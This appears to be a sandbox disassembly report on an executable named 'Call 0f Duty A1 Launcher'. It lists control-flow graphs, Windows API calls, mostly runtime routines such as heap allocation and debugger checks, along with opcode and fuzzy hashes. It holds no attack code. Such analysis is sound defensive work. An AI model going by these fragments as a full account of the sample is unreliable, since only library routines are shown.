                                                                                      • Opcode Fuzzy Hash: cdbebeb10211ecbc7d02cfe28ba2140266656e83d461b5a9cc3a097151bb2329
                                                                                      • Instruction Fuzzy Hash: 26319074520304DFDB13EF56FC566547BACBB0A310F10A1AAE908CB6A1E774B985CF60

                                                                                      Control-flow Graph

                                                                                      • Executed
                                                                                      • Not Executed
                                                                                      control_flow_graph 138 37a732-37a737 139 37a739-37a751 138->139 140 37a753-37a757 139->140 141 37a75f-37a768 139->141 140->141 142 37a759-37a75d 140->142 143 37a77a 141->143 144 37a76a-37a76d 141->144 145 37a7d4-37a7d8 142->145 148 37a77c-37a789 GetStdHandle 143->148 146 37a776-37a778 144->146 147 37a76f-37a774 144->147 145->139 149 37a7de-37a7e1 145->149 146->148 147->148 150 37a7b6-37a7c8 148->150 151 37a78b-37a78d 148->151 150->145 152 37a7ca-37a7cd 150->152 151->150 153 37a78f-37a798 GetFileType 151->153 152->145 153->150 154 37a79a-37a7a3 153->154 155 37a7a5-37a7a9 154->155 156 37a7ab-37a7ae 154->156 155->145 156->145 157 37a7b0-37a7b4 156->157 157->145
                                                                                      APIs
                                                                                      • GetStdHandle.KERNEL32(000000F6,?,?,?,?,?,?,?,00000000,0037A621,0038A088,0000000C), ref: 0037A77E
                                                                                      • GetFileType.KERNELBASE(00000000,?,?,?,?,?,?,?,00000000,0037A621,0038A088,0000000C), ref: 0037A790
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2043249138.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true
                                                                                      • Associated: 00000000.00000002.2042955657.0000000000360000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2043293521.0000000000383000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2043327875.000000000038B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2043357423.000000000038C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2043387506.000000000038F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2043437298.0000000000391000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_360000_Call 0f Duty A1 Launcher.jbxd
                                                                                      Similarity
                                                                                      • API ID: FileHandleType
                                                                                      • String ID:
                                                                                      • API String ID: 3000768030-0
                                                                                      • Opcode ID: 186dba6d6728c87b14f69f80b55a8b9a2cd79b908a50ac6e41079f7c57977b4d
                                                                                      • Instruction ID: 481cbcd8e3650595fb622276e5e7e11ab89d05ee14e2892e6d0be4b265b60253
                                                                                      • Opcode Fuzzy Hash: 186dba6d6728c87b14f69f80b55a8b9a2cd79b908a50ac6e41079f7c57977b4d
                                                                                      • Instruction Fuzzy Hash: CD11D871104FC14ACB3A8A7E8C8862A7AA857D6331B39875DD1BA969F1C23CD846D643

                                                                                      Control-flow Graph

                                                                                      APIs
                                                                                      • GetLastError.KERNEL32(00389D20,0000000C), ref: 00376E13
                                                                                      • ExitThread.KERNEL32 ref: 00376E1A
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2043249138.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true
                                                                                      • Associated: 00000000.00000002.2042955657.0000000000360000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2043293521.0000000000383000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2043327875.000000000038B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2043357423.000000000038C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2043387506.000000000038F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2043437298.0000000000391000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_360000_Call 0f Duty A1 Launcher.jbxd
                                                                                      Similarity
                                                                                      • API ID: ErrorExitLastThread
                                                                                      • String ID:
                                                                                      • API String ID: 1611280651-0
                                                                                      • Opcode ID: 537bc60cdd4b51b280afa743a7151e1a5e0c35c35592896d3c7453c672ed549b
                                                                                      • Instruction ID: d9b36c03347e269b4df8dc1814a195c8da8c824c22d776b62ff4e469535321b7
                                                                                      • Opcode Fuzzy Hash: 537bc60cdd4b51b280afa743a7151e1a5e0c35c35592896d3c7453c672ed549b
                                                                                      • Instruction Fuzzy Hash: 05F0A4749007059FDB23ABB0C84AB6E3B75FF01710F14858AF00A9B291CB785901CB61

                                                                                      Control-flow Graph

                                                                                      • Executed
                                                                                      • Not Executed
                                                                                      control_flow_graph 178 37b0cb-37b0d4 179 37b0d6-37b0e9 RtlFreeHeap 178->179 180 37b103-37b104 178->180 179->180 181 37b0eb-37b102 GetLastError call 37b7a0 call 37b757 179->181 181->180
                                                                                      APIs
                                                                                      • RtlFreeHeap.NTDLL(00000000,00000000,?,0037BC39,?,00000000,?,?,0037BB55,?,00000007,?,?,0037C16E,?,?), ref: 0037B0E1
                                                                                      • GetLastError.KERNEL32(?,?,0037BC39,?,00000000,?,?,0037BB55,?,00000007,?,?,0037C16E,?,?), ref: 0037B0EC
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2043249138.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true
                                                                                      • Associated: 00000000.00000002.2042955657.0000000000360000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2043293521.0000000000383000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2043327875.000000000038B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2043357423.000000000038C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2043387506.000000000038F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2043437298.0000000000391000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_360000_Call 0f Duty A1 Launcher.jbxd
                                                                                      Similarity
                                                                                      • API ID: ErrorFreeHeapLast
                                                                                      • String ID:
                                                                                      • API String ID: 485612231-0
                                                                                      • Opcode ID: 2a1549bb5c3871d2d558fff515c7d6d9e8705887034f23d0e31ab2332c644862
                                                                                      • Instruction ID: 3bcad6b520d722e4ce9f5b6d1ef1330034ee06c1bf73374abe079e3880365243
                                                                                      • Opcode Fuzzy Hash: 2a1549bb5c3871d2d558fff515c7d6d9e8705887034f23d0e31ab2332c644862
                                                                                      • Instruction Fuzzy Hash: 29E08631100308A7CB236BA5FD09B597A6C9F44351F454061F60C8A061C7388940C794

                                                                                      Control-flow Graph

                                                                                      • Executed
                                                                                      • Not Executed
                                                                                      control_flow_graph 263 373b60-373be5 call 36e940 call 373cc0 call 373dc0 call 376ce6 271 373bea-373bf7 263->271 272 373bfe-373c0c 271->272 273 373c55-373c6b 272->273 274 373c12-373c1f 272->274 276 373cb5 273->276 277 373c25-373c32 274->277 278 373c84-373c95 call 37441d 274->278 276->272 281 373c9a-373cb2 call 373e30 call 374241 277->281 282 373c38-373c45 277->282 278->281 286 373c70-373c7f call 373de0 282->286 287 373c4b-373c50 282->287 286->276 287->276
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2043249138.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true
                                                                                      • Associated: 00000000.00000002.2042955657.0000000000360000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2043293521.0000000000383000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2043327875.000000000038B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2043357423.000000000038C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2043387506.000000000038F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2043437298.0000000000391000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_360000_Call 0f Duty A1 Launcher.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: d6e6b426e47b62029f83c0551de06e7216d7fdb0789546c817605dbc55024a27
                                                                                      • Instruction ID: 083f13e3653fd9327a22f617f518581f956c2ee58b412b0f1f478a97b4d06c52
                                                                                      • Opcode Fuzzy Hash: d6e6b426e47b62029f83c0551de06e7216d7fdb0789546c817605dbc55024a27
                                                                                      • Instruction Fuzzy Hash: 0531CAB4D042098FCB26DFA9C5956ADBBF4FF48300F10C41AE45AAB350D7399A05DF56

                                                                                      Control-flow Graph

                                                                                      • Executed
                                                                                      • Not Executed
                                                                                      control_flow_graph 293 379e9e-379ec8 294 379ece-379ed0 293->294 295 379eca-379ecc 293->295 297 379ed6-379edd call 379dd3 294->297 298 379ed2-379ed4 294->298 296 379f1f-379f22 295->296 300 379ee2-379ee6 297->300 298->296 301 379f05-379f1c 300->301 302 379ee8-379ef6 GetProcAddress 300->302 304 379f1e 301->304 302->301 303 379ef8-379f03 call 376ad0 302->303 303->304 304->296
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2043249138.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true
                                                                                      • Associated: 00000000.00000002.2042955657.0000000000360000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2043293521.0000000000383000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2043327875.000000000038B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2043357423.000000000038C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2043387506.000000000038F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2043437298.0000000000391000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_360000_Call 0f Duty A1 Launcher.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 888ffc5e5f9aea8ff2e96744a858618d8325d6cc3e9449166145bb4618867e9d
                                                                                      • Instruction ID: 00d68ffd901b626a5db0dfd2af758bd431a3bc907ce39605723a2332f1622bbe
                                                                                      • Opcode Fuzzy Hash: 888ffc5e5f9aea8ff2e96744a858618d8325d6cc3e9449166145bb4618867e9d
                                                                                      • Instruction Fuzzy Hash: FE01B93361431A9BDB23CF6DEC41B56776DFB81720B298226F618DB954EB34D80097D4

                                                                                      Control-flow Graph

                                                                                      APIs
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2043249138.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true
                                                                                      • Associated: 00000000.00000002.2042955657.0000000000360000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2043293521.0000000000383000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2043327875.000000000038B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2043357423.000000000038C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2043387506.000000000038F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2043437298.0000000000391000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_360000_Call 0f Duty A1 Launcher.jbxd
                                                                                      Similarity
                                                                                      • API ID: CreateElliptic
                                                                                      • String ID:
                                                                                      • API String ID: 1611293138-0
                                                                                      • Opcode ID: 1bcb711a123144469590693d07f2d281416eed74de64f61aaa31f0b0f309f738
                                                                                      • Instruction ID: 1c7168b074b3267f1ba0283547890f6f72959d9b42b7669c32171673e49e6d47
                                                                                      • Opcode Fuzzy Hash: 1bcb711a123144469590693d07f2d281416eed74de64f61aaa31f0b0f309f738
                                                                                      • Instruction Fuzzy Hash: 2F11E5B0D003099BCB04EFA9C4597AEFBF5FF48304F508859D855AB354EB79AA04CB91

                                                                                      Control-flow Graph

                                                                                      • Executed
                                                                                      • Not Executed
                                                                                      control_flow_graph 316 37bc45-37bc51 317 37bc83-37bc8e call 37b757 316->317 318 37bc53-37bc55 316->318 325 37bc90-37bc92 317->325 319 37bc57-37bc58 318->319 320 37bc6e-37bc7f RtlAllocateHeap 318->320 319->320 322 37bc81 320->322 323 37bc5a-37bc61 call 378327 320->323 322->325 323->317 328 37bc63-37bc6c call 377207 323->328 328->317 328->320
                                                                                      APIs
                                                                                      • RtlAllocateHeap.NTDLL(00000000,?,00000000,?,003741E0,?,?,00371007,?,0036FAB5), ref: 0037BC77
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2043249138.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true
                                                                                      • Associated: 00000000.00000002.2042955657.0000000000360000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2043293521.0000000000383000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2043327875.000000000038B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2043357423.000000000038C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2043387506.000000000038F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2043437298.0000000000391000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_360000_Call 0f Duty A1 Launcher.jbxd
                                                                                      Similarity
                                                                                      • API ID: AllocateHeap
                                                                                      • String ID:
                                                                                      • API String ID: 1279760036-0
                                                                                      • Opcode ID: b9450fb0a85737f9c3ace73dac2b17fcbfd77d43bd916068e6c9f47d7a598e8c
                                                                                      • Instruction ID: a23f15871db1af344ba41430785b0252570ab379726e42a246f32f700d37d976
                                                                                      • Opcode Fuzzy Hash: b9450fb0a85737f9c3ace73dac2b17fcbfd77d43bd916068e6c9f47d7a598e8c
                                                                                      • Instruction Fuzzy Hash: B2E0ED35100627A7EA332626DC05BAEFA6CAF813A0F1AC121FC1D9B091CF28CC00C2A0
                                                                                      APIs
                                                                                      • GetModuleHandleW.KERNEL32(kernel32.dll), ref: 00374CB6
                                                                                      • GetProcAddress.KERNEL32(00000000,FlsAlloc), ref: 00374CC4
                                                                                      • GetProcAddress.KERNEL32(00000000,FlsFree), ref: 00374CD5
                                                                                      • GetProcAddress.KERNEL32(00000000,FlsGetValue), ref: 00374CE6
                                                                                      • GetProcAddress.KERNEL32(00000000,FlsSetValue), ref: 00374CF7
                                                                                      • GetProcAddress.KERNEL32(00000000,InitializeCriticalSectionEx), ref: 00374D08
                                                                                      • GetProcAddress.KERNEL32(00000000,InitOnceExecuteOnce), ref: 00374D19
                                                                                      • GetProcAddress.KERNEL32(00000000,CreateEventExW), ref: 00374D2A
                                                                                      • GetProcAddress.KERNEL32(00000000,CreateSemaphoreW), ref: 00374D3B
                                                                                      • GetProcAddress.KERNEL32(00000000,CreateSemaphoreExW), ref: 00374D4C
                                                                                      • GetProcAddress.KERNEL32(00000000,CreateThreadpoolTimer), ref: 00374D5D
                                                                                      • GetProcAddress.KERNEL32(00000000,SetThreadpoolTimer), ref: 00374D6E
                                                                                      • GetProcAddress.KERNEL32(00000000,WaitForThreadpoolTimerCallbacks), ref: 00374D7F
                                                                                      • GetProcAddress.KERNEL32(00000000,CloseThreadpoolTimer), ref: 00374D90
                                                                                      • GetProcAddress.KERNEL32(00000000,CreateThreadpoolWait), ref: 00374DA1
                                                                                      • GetProcAddress.KERNEL32(00000000,SetThreadpoolWait), ref: 00374DB2
                                                                                      • GetProcAddress.KERNEL32(00000000,CloseThreadpoolWait), ref: 00374DC3
                                                                                      • GetProcAddress.KERNEL32(00000000,FlushProcessWriteBuffers), ref: 00374DD4
                                                                                      • GetProcAddress.KERNEL32(00000000,FreeLibraryWhenCallbackReturns), ref: 00374DE5
                                                                                      • GetProcAddress.KERNEL32(00000000,GetCurrentProcessorNumber), ref: 00374DF6
                                                                                      • GetProcAddress.KERNEL32(00000000,CreateSymbolicLinkW), ref: 00374E07
                                                                                      • GetProcAddress.KERNEL32(00000000,GetCurrentPackageId), ref: 00374E18
                                                                                      • GetProcAddress.KERNEL32(00000000,GetTickCount64), ref: 00374E29
                                                                                      • GetProcAddress.KERNEL32(00000000,GetFileInformationByHandleEx), ref: 00374E3A
                                                                                      • GetProcAddress.KERNEL32(00000000,SetFileInformationByHandle), ref: 00374E4B
                                                                                      • GetProcAddress.KERNEL32(00000000,GetSystemTimePreciseAsFileTime), ref: 00374E5C
                                                                                      • GetProcAddress.KERNEL32(00000000,InitializeConditionVariable), ref: 00374E6D
                                                                                      • GetProcAddress.KERNEL32(00000000,WakeConditionVariable), ref: 00374E7E
                                                                                      • GetProcAddress.KERNEL32(00000000,WakeAllConditionVariable), ref: 00374E8F
                                                                                      • GetProcAddress.KERNEL32(00000000,SleepConditionVariableCS), ref: 00374EA0
                                                                                      • GetProcAddress.KERNEL32(00000000,InitializeSRWLock), ref: 00374EB1
                                                                                      • GetProcAddress.KERNEL32(00000000,AcquireSRWLockExclusive), ref: 00374EC2
                                                                                      • GetProcAddress.KERNEL32(00000000,TryAcquireSRWLockExclusive), ref: 00374ED3
                                                                                      • GetProcAddress.KERNEL32(00000000,ReleaseSRWLockExclusive), ref: 00374EE4
                                                                                      • GetProcAddress.KERNEL32(00000000,SleepConditionVariableSRW), ref: 00374EF5
                                                                                      • GetProcAddress.KERNEL32(00000000,CreateThreadpoolWork), ref: 00374F06
                                                                                      • GetProcAddress.KERNEL32(00000000,SubmitThreadpoolWork), ref: 00374F17
                                                                                      • GetProcAddress.KERNEL32(00000000,CloseThreadpoolWork), ref: 00374F28
                                                                                      • GetProcAddress.KERNEL32(00000000,CompareStringEx), ref: 00374F39
                                                                                      • GetProcAddress.KERNEL32(00000000,GetLocaleInfoEx), ref: 00374F4A
                                                                                      • GetProcAddress.KERNEL32(00000000,LCMapStringEx), ref: 00374F5B
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2043249138.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true
                                                                                      • Associated: 00000000.00000002.2042955657.0000000000360000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2043293521.0000000000383000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2043327875.000000000038B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2043357423.000000000038C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2043387506.000000000038F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2043437298.0000000000391000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_360000_Call 0f Duty A1 Launcher.jbxd
                                                                                      Similarity
                                                                                      • API ID: AddressProc$HandleModule
                                                                                      • String ID: AcquireSRWLockExclusive$CloseThreadpoolTimer$CloseThreadpoolWait$CloseThreadpoolWork$CompareStringEx$CreateEventExW$CreateSemaphoreExW$CreateSemaphoreW$CreateSymbolicLinkW$CreateThreadpoolTimer$CreateThreadpoolWait$CreateThreadpoolWork$FlsAlloc$FlsFree$FlsGetValue$FlsSetValue$FlushProcessWriteBuffers$FreeLibraryWhenCallbackReturns$GetCurrentPackageId$GetCurrentProcessorNumber$GetFileInformationByHandleEx$GetLocaleInfoEx$GetSystemTimePreciseAsFileTime$GetTickCount64$InitOnceExecuteOnce$InitializeConditionVariable$InitializeCriticalSectionEx$InitializeSRWLock$LCMapStringEx$ReleaseSRWLockExclusive$SetFileInformationByHandle$SetThreadpoolTimer$SetThreadpoolWait$SleepConditionVariableCS$SleepConditionVariableSRW$SubmitThreadpoolWork$TryAcquireSRWLockExclusive$WaitForThreadpoolTimerCallbacks$WakeAllConditionVariable$WakeConditionVariable$kernel32.dll
                                                                                      • API String ID: 667068680-295688737
                                                                                      • Opcode ID: 07596f0263443e7805665c9d132ccfcf47c27a3db90f0e46145cabe179cff665
                                                                                      • Instruction ID: 300694197f2773e36526db54ed8fe04ee81cdad26cabe2cea66a83a01fc47e09
                                                                                      • Opcode Fuzzy Hash: 07596f0263443e7805665c9d132ccfcf47c27a3db90f0e46145cabe179cff665
                                                                                      • Instruction Fuzzy Hash: 516124719A2350ABC703AFF6AC0EAD63BECAB09701B1454D7F121D3661DFB4A1418B75
                                                                                      APIs
                                                                                      • GetCurrentThreadId.KERNEL32 ref: 0036CF90
                                                                                      • std::_Throw_Cpp_error.LIBCPMT ref: 0036D216
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2043249138.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true
                                                                                      • Associated: 00000000.00000002.2042955657.0000000000360000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2043293521.0000000000383000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2043327875.000000000038B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2043357423.000000000038C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2043387506.000000000038F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2043437298.0000000000391000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_360000_Call 0f Duty A1 Launcher.jbxd
                                                                                      Similarity
                                                                                      • API ID: Cpp_errorCurrentThreadThrow_std::_
                                                                                      • String ID:
                                                                                      • API String ID: 350343453-0
                                                                                      • Opcode ID: 05dac9d37ae5e8791d69ac7270e627a01d00848dab6b1b5c711937b5247893fa
                                                                                      • Instruction ID: 5c7cdbec0077b252a54bc1cd2117e43fee5301bd8be2b4405f02738299a3285f
                                                                                      • Opcode Fuzzy Hash: 05dac9d37ae5e8791d69ac7270e627a01d00848dab6b1b5c711937b5247893fa
                                                                                      • Instruction Fuzzy Hash: D2F10976E505104FEB014A7CC8A83DF6BE68B66330F2B6729DAB45F7D2DA2744098F50
                                                                                      APIs
                                                                                      • FindFirstFileExW.KERNEL32(?,00000000,?,00000000,00000000,00000000,00000000,00000000,00000000), ref: 0037C8CB
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2043249138.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true
                                                                                      • Associated: 00000000.00000002.2042955657.0000000000360000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2043293521.0000000000383000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2043327875.000000000038B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2043357423.000000000038C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2043387506.000000000038F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2043437298.0000000000391000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_360000_Call 0f Duty A1 Launcher.jbxd
                                                                                      Similarity
                                                                                      • API ID: FileFindFirst
                                                                                      • String ID:
                                                                                      • API String ID: 1974802433-0
                                                                                      • Opcode ID: 456a8d9afc95b5b4760ac01d2e9459295c0c9759ebfda78231f4f8d41fbcb13e
                                                                                      • Instruction ID: 916fcb43d4cc34bdfc4c098d2e262e2b94bb08fde4ced670a50542008952e45b
                                                                                      • Opcode Fuzzy Hash: 456a8d9afc95b5b4760ac01d2e9459295c0c9759ebfda78231f4f8d41fbcb13e
                                                                                      • Instruction Fuzzy Hash: BC71C27191421D6FDF36EF28DC89AAEB7B9AB05300F1991DDE00DA7211DB388E858F50
                                                                                      APIs
                                                                                      • IsProcessorFeaturePresent.KERNEL32(00000017), ref: 00375450
                                                                                      • IsDebuggerPresent.KERNEL32 ref: 0037551C
                                                                                      • SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 0037553C
                                                                                      • UnhandledExceptionFilter.KERNEL32(?), ref: 00375546
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2043249138.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true
                                                                                      • Associated: 00000000.00000002.2042955657.0000000000360000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2043293521.0000000000383000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2043327875.000000000038B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2043357423.000000000038C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2043387506.000000000038F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2043437298.0000000000391000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_360000_Call 0f Duty A1 Launcher.jbxd
                                                                                      Similarity
                                                                                      • API ID: ExceptionFilterPresentUnhandled$DebuggerFeatureProcessor
                                                                                      • String ID:
                                                                                      • API String ID: 254469556-0
                                                                                      • Opcode ID: b1915b5bf0cc80a4bff5663b89b8f131ead4295e5c20294e79337c7ba56170ac
                                                                                      • Instruction ID: 5ad537d445e35676cd193e0388a0744a4d2dac83d812aec533fbc57504e400b8
                                                                                      • Opcode Fuzzy Hash: b1915b5bf0cc80a4bff5663b89b8f131ead4295e5c20294e79337c7ba56170ac
                                                                                      • Instruction Fuzzy Hash: 7A310775D453189BDF21DFA5D9897CDBBB8AF08304F1080EAE40DAB250EBB49A85CF05
                                                                                      APIs
                                                                                      • IsDebuggerPresent.KERNEL32(?,?,?,?,?,00000000), ref: 00377EC2
                                                                                      • SetUnhandledExceptionFilter.KERNEL32(00000000,?,?,?,?,?,00000000), ref: 00377ECC
                                                                                      • UnhandledExceptionFilter.KERNEL32(-00000327,?,?,?,?,?,00000000), ref: 00377ED9
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2043249138.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true
                                                                                      • Associated: 00000000.00000002.2042955657.0000000000360000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2043293521.0000000000383000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2043327875.000000000038B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2043357423.000000000038C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2043387506.000000000038F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2043437298.0000000000391000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_360000_Call 0f Duty A1 Launcher.jbxd
                                                                                      Similarity
                                                                                      • API ID: ExceptionFilterUnhandled$DebuggerPresent
                                                                                      • String ID:
                                                                                      • API String ID: 3906539128-0
                                                                                      • Opcode ID: 0b2b5e8c794a8b33927434957198613ed7302a5b47ebf0310ad75858fb6f0833
                                                                                      • Instruction ID: c7a3c8f3a6c167741975a6221cf160a96723379984aac1fc5c85f53479b9fcf7
                                                                                      • Opcode Fuzzy Hash: 0b2b5e8c794a8b33927434957198613ed7302a5b47ebf0310ad75858fb6f0833
                                                                                      • Instruction Fuzzy Hash: 3831C6749012189BCB62DF24DC89B9DB7B8BF08350F5081DAE41CA7251E7749F858F44
                                                                                      APIs
                                                                                      • ___std_exception_destroy.LIBVCRUNTIME ref: 00372437
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2043249138.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true
                                                                                      • Associated: 00000000.00000002.2042955657.0000000000360000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2043293521.0000000000383000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2043327875.000000000038B000.00000040.00000001.01000000.00000003.sdmpDownload File
